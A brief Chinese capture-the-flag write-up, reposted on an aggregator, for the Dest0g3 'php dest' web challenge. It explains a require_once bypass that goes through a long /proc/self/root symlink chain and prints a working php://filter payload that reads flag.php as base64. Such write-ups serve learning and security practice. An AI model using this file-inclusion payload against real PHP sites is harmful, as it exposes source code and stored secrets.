首页 > 编程语言> > 【Dest0g3 520迎新赛】Web-php dest

【Dest0g3 520迎新赛】Web-php dest

2022-06-16 13:04:06 作者：互联网

前言

做了一下。

Web

php dest

文件包含，但是需要绕过require_once，这题实际来源于[WMCTF2020]Make PHP Great Again：

PHP最新版的小Trick， require_once包含的软链接层数较多时once的hash匹配会直接失效造成重复包含

构造payload：

?file=php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php

标签：Web,Dest0g3,dest,root,self,php,proc,once
来源： https://www.cnblogs.com/crazysong11/p/16291448.html